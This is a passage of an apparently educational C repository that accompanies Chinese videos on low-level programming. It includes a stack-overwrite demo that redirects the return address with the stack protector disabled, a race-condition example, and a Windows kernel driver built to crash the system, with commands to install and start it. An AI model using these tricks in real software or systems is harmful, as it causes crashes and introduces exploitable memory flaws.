├── .gitignore
├── LICENSE
├── README.md
├── doc
├── VXGZH.jpg
├── array.jpg
├── atomic.png
├── bsod.png
├── buy.png
├── cache.png
├── canary.png
├── cover-a.jpg
├── cover-b.jpg
├── mfence.png
├── overflow.PNG
├── overflow.png
├── prediction.png
├── setjmp-longjmp.png
├── shellcode.png
├── spectre.png
├── syscall.jpg
└── wallpaper.png
└── source
├── arrayOverflow.c
├── atomic.c
├── bsod
├── bsod.c
├── bsod.sys
├── mce.h
├── ntoskrnl.lib
└── wdm.h
├── cache.c
├── canary.c
├── meltdown
├── linuxDriver
│ ├── Makefile
│ └── kernelDriver.c
├── meltdown.c
└── winDriver
│ ├── kernelDriver.c
│ ├── kernelDriver.sys
│ ├── mce.h
│ ├── ntoskrnl.lib
│ └── wdm.h
├── mfence-win.cpp
├── mfence.cpp
├── prediction.c
├── setjmp-longjmp.c
├── shellcode
├── injectShellcode.c
├── shellcode-non-zero.s
├── shellcode.bin
├── shellcode.c
├── shellcode.s
└── shellcodeSled.bin
├── spectre
├── spectre-ii.c
├── spectre-iii.c
└── spectre.c
├── syscall.s
└── virtualMemory.c
/.gitignore:
--------------------------------------------------------------------------------
1 | # Prerequisites
2 | *.d
3 |
4 | # Compiled Object files
5 | *.slo
6 | *.lo
7 | *.o
8 | *.obj
9 |
10 | # Precompiled Headers
11 | *.gch
12 | *.pch
13 |
14 | # Compiled Dynamic libraries
15 | *.so
16 | *.dylib
17 | *.dll
18 |
19 | # Fortran module files
20 | *.mod
21 | *.smod
22 |
23 | # Compiled Static libraries
24 | *.lai
25 | *.la
26 | *.a
27 |
28 | # Executables
29 | *.exe
30 | *.out
31 | *.app
32 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # 歡迎蒞臨:阿布編程
2 |
關注:沒有用的知識
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 | ## 快速上手
14 | - 👀 在 B 站觀看[《CPU眼裏的:編程知識》](https://space.bilibili.com/261582436)視頻系列
15 | - 🧪 找到感興趣的話題,上手實驗
16 |
17 | ## 代碼目錄
18 |
40 |
41 | ## 📚實體 + 電子書籍
42 | 如果喜歡阿布的講述方式,希望更加系統的學習這些知識,也可以看看阿布的新書《CPU眼裏的C/C++》
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 | 购买链接:https://item.jd.com/14135576.html
51 |
52 | 掃描二維碼,5折購買或0元試讀電子版
53 | 
54 |
55 | ## 📞社區交流
56 | - 視頻的圖、文版本,可以在:《阿布編程》的公衆號中閲讀
57 | - 遇到問題,可以在《阿布編程》的公衆號中討論
58 | - 微信公衆號:
59 |
60 |
61 | 公众号🔑:阿布编程
62 |
63 |
64 |
--------------------------------------------------------------------------------
/doc/VXGZH.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/VXGZH.jpg
--------------------------------------------------------------------------------
/doc/array.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/array.jpg
--------------------------------------------------------------------------------
/doc/atomic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/atomic.png
--------------------------------------------------------------------------------
/doc/bsod.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/bsod.png
--------------------------------------------------------------------------------
/doc/buy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/buy.png
--------------------------------------------------------------------------------
/doc/cache.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/cache.png
--------------------------------------------------------------------------------
/doc/canary.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/canary.png
--------------------------------------------------------------------------------
/doc/cover-a.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/cover-a.jpg
--------------------------------------------------------------------------------
/doc/cover-b.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/cover-b.jpg
--------------------------------------------------------------------------------
/doc/mfence.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/mfence.png
--------------------------------------------------------------------------------
/doc/overflow.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/overflow.PNG
--------------------------------------------------------------------------------
/doc/overflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/overflow.png
--------------------------------------------------------------------------------
/doc/prediction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/prediction.png
--------------------------------------------------------------------------------
/doc/setjmp-longjmp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/setjmp-longjmp.png
--------------------------------------------------------------------------------
/doc/shellcode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/shellcode.png
--------------------------------------------------------------------------------
/doc/spectre.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/spectre.png
--------------------------------------------------------------------------------
/doc/syscall.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/syscall.jpg
--------------------------------------------------------------------------------
/doc/wallpaper.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/doc/wallpaper.png
--------------------------------------------------------------------------------
/source/arrayOverflow.c:
--------------------------------------------------------------------------------
1 | //gcc arrayOverflow.c -fno-stack-protector
2 |
3 | #include
4 | #include
5 |
6 | void malfunc()
7 | {
8 | printf("💀💀💀💀\n");
9 | exit(4);
10 | }
11 |
12 | void func_1()
13 | {
14 | long a[2];
15 | a[3] = (long)malfunc;
16 | a[1] = 1;
17 | a[0] = 2;
18 | a[-1] = 3;
19 | a[-2] = 4;
20 | }
21 |
22 | int main()
23 | {
24 | func_1();
25 | printf("岁月静好✅");
26 | return 0;
27 | }
28 |
--------------------------------------------------------------------------------
/source/atomic.c:
--------------------------------------------------------------------------------
1 | //gcc atomic.c -lpthread
2 |
3 | #include
4 | #include
5 |
6 | int a;
7 | //_Atomic int a; //uncomment this code to fix race condition
8 |
9 | void* sum()
10 | {
11 | for(int i = 0; i < 10000000; i++)
12 | {
13 | a++;
14 | }
15 | }
16 |
17 | void test()
18 | {
19 | a = 0;
20 | pthread_t t1, t2;
21 | pthread_create(&t1, NULL, sum, NULL);
22 | pthread_create(&t2, NULL, sum, NULL);
23 |
24 | pthread_join(t1, NULL);
25 | pthread_join(t2, NULL);
26 | printf("a = %d\n", a);
27 | }
28 |
29 | int main()
30 | {
31 | test();
32 | test();
33 | test();
34 | }
--------------------------------------------------------------------------------
/source/bsod/bsod.c:
--------------------------------------------------------------------------------
1 | //cl.exe bsod.c ntoskrnl.lib /I .\ /link /out:bsod.sys /subsystem:native /driver:wdm -entry:DriverEntry
2 | //sc create bsodDriver binpath=%cd%\bsod.sys type=kernel
3 | //sc start bsodDriver
4 | //sc stop abuDriver
5 | //sc delete abuDriver
6 |
7 | int func(int input)
8 | {
9 | return 1/input;
10 | }
11 |
12 | #define _AMD64_
13 | #include "wdm.h"
14 |
15 | NTSTATUS DriverEntry(void* a, void* b)
16 | {
17 | func(0);
18 | }
19 |
20 | /*
21 | //cl.exe bsod.c user32.lib /link /entry:main
22 | #include
23 | int main()
24 | {
25 | func(0);
26 | MessageBoxA(NULL, "Abu Coding", NULL, MB_OK);
27 | }
28 | */
--------------------------------------------------------------------------------
/source/bsod/bsod.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/bsod/bsod.sys
--------------------------------------------------------------------------------
/source/bsod/mce.h:
--------------------------------------------------------------------------------
1 | /*++ BUILD Version: 0011 // Increment this if a change has global effects
2 |
3 | Copyright (c) 1991-2001 Microsoft Corporation
4 |
5 | Module Name:
6 |
7 | mce.h
8 |
9 | Abstract:
10 |
11 | This header file defines the Machine Check Errors definitions.
12 |
13 | Author:
14 |
15 | Revision History:
16 |
17 | Creation: 04-Apr-2001
18 |
19 | --*/
20 |
21 | #ifndef _MCE_
22 | #define _MCE_
23 |
24 | #pragma once
25 |
26 | #if _MSC_VER >= 1200
27 | #pragma warning(push)
28 | #pragma warning(disable:4201) // nonstandard extension used : nameless struct/union
29 | #pragma warning(disable:4214) // nonstandard extension used : bit field types other then int
30 | #endif
31 |
32 | //
33 | // HalMcaLogInformation
34 | //
35 |
36 | typedef enum {
37 | HAL_MCE_RECORD,
38 | HAL_MCA_RECORD
39 | } MCA_EXCEPTION_TYPE;
40 |
41 | #if defined(_X86_) || defined(_IA64_) || defined(_AMD64_)
42 |
43 | //
44 | // ADDR register for each MCA bank
45 | //
46 |
47 | typedef union _MCI_ADDR{
48 | struct {
49 | ULONG Address;
50 | ULONG Reserved;
51 | } DUMMYSTRUCTNAME;
52 |
53 | ULONGLONG QuadPart;
54 | } MCI_ADDR, *PMCI_ADDR;
55 |
56 |
57 | #if defined(_AMD64_)
58 |
59 | //
60 | // STATUS register for each MCA bank.
61 | //
62 |
63 | #if (NTDDI_VERSION <= NTDDI_WINXP)
64 | typedef union _MCI_STATS {
65 | struct {
66 | USHORT McaCod;
67 | USHORT ModelErrorCode;
68 | ULONG OtherInfo : 25;
69 | ULONG Damage : 1;
70 | ULONG AddressValid : 1;
71 | ULONG MiscValid : 1;
72 | ULONG Enabled : 1;
73 | ULONG Uncorrected : 1;
74 | ULONG OverFlow : 1;
75 | ULONG Valid : 1;
76 | } MciStatus;
77 |
78 | ULONG64 QuadPart;
79 | } MCI_STATS, *PMCI_STATS;
80 | #else
81 | typedef union _MCI_STATS {
82 | struct {
83 | USHORT McaErrorCode;
84 | USHORT ModelErrorCode;
85 | ULONG OtherInformation : 25;
86 | ULONG ContextCorrupt : 1;
87 | ULONG AddressValid : 1;
88 | ULONG MiscValid : 1;
89 | ULONG ErrorEnabled : 1;
90 | ULONG UncorrectedError : 1;
91 | ULONG StatusOverFlow : 1;
92 | ULONG Valid : 1;
93 | } MciStatus;
94 |
95 | ULONG64 QuadPart;
96 | } MCI_STATS, *PMCI_STATS;
97 | #endif
98 |
99 | #endif // _AMD64_
100 |
101 | #if defined(_X86_)
102 |
103 | //
104 | // STATUS register for each MCA bank.
105 | //
106 |
107 | typedef union _MCI_STATS {
108 | struct {
109 | USHORT McaCod;
110 | USHORT MsCod;
111 | ULONG OtherInfo : 25;
112 | ULONG Damage : 1;
113 | ULONG AddressValid : 1;
114 | ULONG MiscValid : 1;
115 | ULONG Enabled : 1;
116 | ULONG UnCorrected : 1;
117 | ULONG OverFlow : 1;
118 | ULONG Valid : 1;
119 | } MciStats;
120 |
121 | ULONGLONG QuadPart;
122 |
123 | } MCI_STATS, *PMCI_STATS;
124 |
125 | #endif // _X86_
126 |
127 | //
128 | // MCA exception log entry
129 | // Defined as a union to contain MCA specific log or Pentium style MCE info.
130 | //
131 |
132 | #define MCA_EXTREG_V2MAX 24 // X86: Max. Number of extended registers
133 |
134 | #if defined(_X86_) || defined(_AMD64_)
135 |
136 | #if (NTDDI_VERSION >= NTDDI_WINXP)
137 | typedef struct _MCA_EXCEPTION {
138 |
139 | // Begin Version 1 stuff
140 | ULONG VersionNumber; // Version number of this record type
141 | MCA_EXCEPTION_TYPE ExceptionType; // MCA or MCE
142 | LARGE_INTEGER TimeStamp; // exception recording timestamp
143 | ULONG ProcessorNumber;
144 | ULONG Reserved1;
145 |
146 | union {
147 | struct {
148 | UCHAR BankNumber;
149 | UCHAR Reserved2[7];
150 | MCI_STATS Status;
151 | MCI_ADDR Address;
152 | ULONGLONG Misc;
153 | } Mca;
154 |
155 | struct {
156 | ULONGLONG Address; // physical addr of cycle causing the error
157 | ULONGLONG Type; // cycle specification causing the error
158 | } Mce;
159 | } u;
160 | // End Version 1 stuff
161 |
162 | // Begin Version 2 stuff
163 | ULONG ExtCnt;
164 | ULONG Reserved3;
165 | ULONGLONG ExtReg[MCA_EXTREG_V2MAX];
166 | // End Version 2 stuff
167 |
168 | } MCA_EXCEPTION, *PMCA_EXCEPTION;
169 | #else
170 | typedef struct _MCA_EXCEPTION {
171 |
172 | ULONG VersionNumber; // Version number of this record type
173 | MCA_EXCEPTION_TYPE ExceptionType; // MCA or MCE
174 | LARGE_INTEGER TimeStamp; // exception recording timestamp
175 | ULONG ProcessorNumber;
176 | ULONG Reserved1;
177 |
178 | union {
179 | struct {
180 | UCHAR BankNumber;
181 | UCHAR Reserved2[7];
182 | MCI_STATS Status;
183 | MCI_ADDR Address;
184 | ULONGLONG Misc;
185 | } Mca;
186 |
187 | struct {
188 | ULONGLONG Address; // physical addr of cycle causing the error
189 | ULONGLONG Type; // cycle specification causing the error
190 | } Mce;
191 | } u;
192 |
193 | } MCA_EXCEPTION, *PMCA_EXCEPTION;
194 | #endif
195 |
196 | typedef MCA_EXCEPTION CMC_EXCEPTION, *PCMC_EXCEPTION; // Corrected Machine Check
197 | typedef MCA_EXCEPTION CPE_EXCEPTION, *PCPE_EXCEPTION; // Corrected Platform Error
198 |
199 | #if (NTDDI_VERSION >= NTDDI_WINXP)
200 | #define MCA_EXCEPTION_V1_SIZE FIELD_OFFSET(MCA_EXCEPTION, ExtCnt)
201 | #define MCA_EXCEPTION_V2_SIZE sizeof(struct _MCA_EXCEPTION)
202 | #endif
203 |
204 | #endif // _X86_ || _AMD64_
205 |
206 | //
207 | // ERRORS: ERROR_SEVERITY definitions
208 | //
209 | // One day the MS compiler will support typed enums with type != int so this
210 | // type of enums (UCHAR, __int64) could be defined...
211 | //
212 |
213 | #if defined(_AMD64_) || defined(_IA64_)
214 |
215 | typedef UCHAR ERROR_SEVERITY, *PERROR_SEVERITY;
216 |
217 | typedef enum _ERROR_SEVERITY_VALUE {
218 | ErrorRecoverable = 0,
219 | ErrorFatal = 1,
220 | ErrorCorrected = 2,
221 | ErrorOthers = 3, // [3,...] values are reserved
222 | } ERROR_SEVERITY_VALUE;
223 |
224 | #endif
225 |
226 | #if defined(_IA64_)
227 |
228 | #if 0
229 | // FIXFIX: This should not be required for IA64.
230 | //
231 | // STATUS register for each MCA bank.
232 | //
233 |
234 | typedef union _MCI_STATS {
235 | struct {
236 | USHORT McaCod;
237 | USHORT MsCod;
238 | ULONG OtherInfo : 25;
239 | ULONG Damage : 1;
240 | ULONG AddressValid : 1;
241 | ULONG MiscValid : 1;
242 | ULONG Enabled : 1;
243 | ULONG UnCorrected : 1;
244 | ULONG OverFlow : 1;
245 | ULONG Valid : 1;
246 | } MciStats;
247 |
248 | ULONGLONG QuadPart;
249 |
250 | } MCI_STATS, *PMCI_STATS;
251 |
252 | #endif // 0
253 |
254 | //
255 | // IA64 ERRORS: ERROR_REVISION definitions
256 | //
257 |
258 | typedef union _ERROR_REVISION {
259 | USHORT Revision; // Major and Minor revision number of the record:
260 | struct {
261 | UCHAR Minor; // Byte0: Minor.
262 | UCHAR Major; // Byte1: Major.
263 | } DUMMYSTRUCTNAME;
264 | } ERROR_REVISION, *PERROR_REVISION;
265 |
266 | // For Info:
267 | #if (NTDDI_VERSION > NTDDI_WINXP)
268 | #define ERROR_MAJOR_REVISION_SAL_03_00 0
269 | #define ERROR_MINOR_REVISION_SAL_03_00 2
270 | #define ERROR_REVISION_SAL_03_00 { ERROR_MINOR_REVISION_SAL_03_00, \
271 | ERROR_MAJOR_REVISION_SAL_03_00 }
272 |
273 | //
274 | // Section Header revision is fixed at Major == 2 and Minor == 0
275 | //
276 | #define ERROR_FIXED_SECTION_REVISION { 2,\
277 | 0 }
278 | #else
279 | #define ERROR_REVISION_SAL_03_00 { 2, 0 }
280 | #endif
281 |
282 | //
283 | // IA64 ERRORS: ERROR_TIMESTAMP definitions
284 | //
285 |
286 | typedef union _ERROR_TIMESTAMP {
287 | ULONGLONG TimeStamp;
288 | struct {
289 | UCHAR Seconds; // Byte0: Seconds
290 | UCHAR Minutes; // Byte1: Minutes
291 | UCHAR Hours; // Byte2: Hours
292 | UCHAR Reserved; // Byte3: Reserved
293 | UCHAR Day; // Byte4: Day
294 | UCHAR Month; // Byte5: Month
295 | UCHAR Year; // Byte6: Year
296 | UCHAR Century; // Byte7: Century
297 | } DUMMYSTRUCTNAME;
298 | } ERROR_TIMESTAMP, *PERROR_TIMESTAMP;
299 |
300 | //
301 | // IA64 ERRORS: ERROR_GUID definitions
302 | //
303 |
304 | typedef struct _ERROR_GUID {
305 | ULONG Data1;
306 | USHORT Data2;
307 | USHORT Data3;
308 | UCHAR Data4[8];
309 | } ERROR_GUID, *PERROR_GUID;
310 |
311 | //
312 | // IA64 ERRORS: ERROR GUIDs definitions
313 | //
314 |
315 | typedef ERROR_GUID _ERROR_DEVICE_GUID;
316 | typedef _ERROR_DEVICE_GUID ERROR_DEVICE_GUID, *PERROR_DEVICE_GUID;
317 |
318 | typedef ERROR_GUID _ERROR_PLATFORM_GUID;
319 | typedef _ERROR_PLATFORM_GUID ERROR_PLATFORM_GUID, *PERROR_PLATFORM_GUID;
320 |
321 | //
322 | // IA64 ERRORS: ERROR_RECORD_HEADER definitions
323 | //
324 |
325 | typedef union _ERROR_RECORD_VALID {
326 | UCHAR Valid;
327 | struct { // Bits
328 | UCHAR OemPlatformID:1; // 0: OEM Platform Id is present in the record header
329 | UCHAR Reserved:7; // 1-7: Reserved
330 | } DUMMYSTRUCTNAME;
331 | } ERROR_RECORD_VALID, *PERROR_RECORD_VALID;
332 |
333 | typedef struct _ERROR_RECORD_HEADER { // Offsets:
334 | ULONGLONG Id; // 0: Unique identifier
335 | ERROR_REVISION Revision; // 8: Major and Minor revision number of the record
336 | ERROR_SEVERITY ErrorSeverity; // 10: Error Severity
337 | ERROR_RECORD_VALID Valid; // 11: Validation bits
338 | ULONG Length; // 12: Length of this record in bytes, including the header
339 | ERROR_TIMESTAMP TimeStamp; // 16: Timestamp recorded when event occurred
340 | UCHAR OemPlatformId[16]; // 24: Unique platform identifier. OEM defined.
341 | } ERROR_RECORD_HEADER, *PERROR_RECORD_HEADER;
342 |
343 | //
344 | // IA64 ERRORS: ERROR_SECTION_HEADER definitions
345 | //
346 |
347 | typedef union _ERROR_RECOVERY_INFO {
348 | UCHAR RecoveryInfo;
349 | struct { // Bits:
350 | UCHAR Corrected:1; // 0: Corrected
351 | UCHAR NotContained:1; // 1: Containment Warning
352 | UCHAR Reset:1; // 2: Reset
353 | UCHAR Reserved:4; // 6-3: Reserved
354 | UCHAR Valid:1; // 7: Valid Recovery Information
355 | } DUMMYSTRUCTNAME;
356 | } ERROR_RECOVERY_INFO, *PERROR_RECOVERY_INFO;
357 |
358 | typedef struct _ERROR_SECTION_HEADER {
359 | ERROR_DEVICE_GUID Guid; // Unique identifier
360 | ERROR_REVISION Revision; // Major and Minor revision number of the section
361 | ERROR_RECOVERY_INFO RecoveryInfo; // Recovery Information
362 | UCHAR Reserved;
363 | ULONG Length; // Length of this error device section in bytes,
364 | // including the header.
365 | } ERROR_SECTION_HEADER, *PERROR_SECTION_HEADER;
366 |
367 | //
368 | // IA64 Machine Check Error Logs:
369 | // WMI requires processor LID being stored in the Log.
370 | // This LID corresponds to the processor on which the SAL_PROC was executed on.
371 | //
372 | // TEMPTEMP: Implementation is temporary, until we implement HAL SW Error Section.
373 | // Note that the current FW builds do not update the _ERROR_PROCESSOR.CRLid field,
374 | // assuming there is a _ERROR_PROCESSOR section in the record.
375 | //
376 |
377 | #if !defined(__midl) && defined(_MSC_EXTENSIONS)
378 | __inline
379 | USHORT
380 | GetFwMceLogProcessorNumber(
381 | PERROR_RECORD_HEADER Log
382 | )
383 | {
384 | PERROR_SECTION_HEADER section = (PERROR_SECTION_HEADER)((ULONG64)Log + sizeof(*Log));
385 | USHORT lid = (USHORT)((UCHAR)(section->Reserved));
386 | lid |= (USHORT)((UCHAR)(Log->TimeStamp.Reserved) << 8);
387 | return( lid );
388 | } // GetFwMceLogProcessorNumber()
389 | #endif // !__midl
390 |
391 | //
392 | // IA64 ERRORS: ERROR_PROCESSOR device definitions
393 | //
394 | // The MCA architecture supports five different types of error reporting functional units
395 | // with the associated error records and its error severity.
396 | // At any point in time, a processor could encounter an MCA/CMC event due to errors detected
397 | // in one or more of the following units:
398 | // - Cache Check
399 | // - TLB Check
400 | // - Bus Check
401 | // - Register File
402 | // - Micro Architectural
403 | //
404 | // Terminology:
405 | //
406 | // - Target Address:
407 | // 64-bit integer containing the physical address where the data was to be delivered or
408 | // obtained. This could also be the incoming address for external snoops and TLB shoot-downs.
409 | //
410 | // - Requester Identifier:
411 | // 64-bit integer specifying the bus agent that generated the transaction responsible for
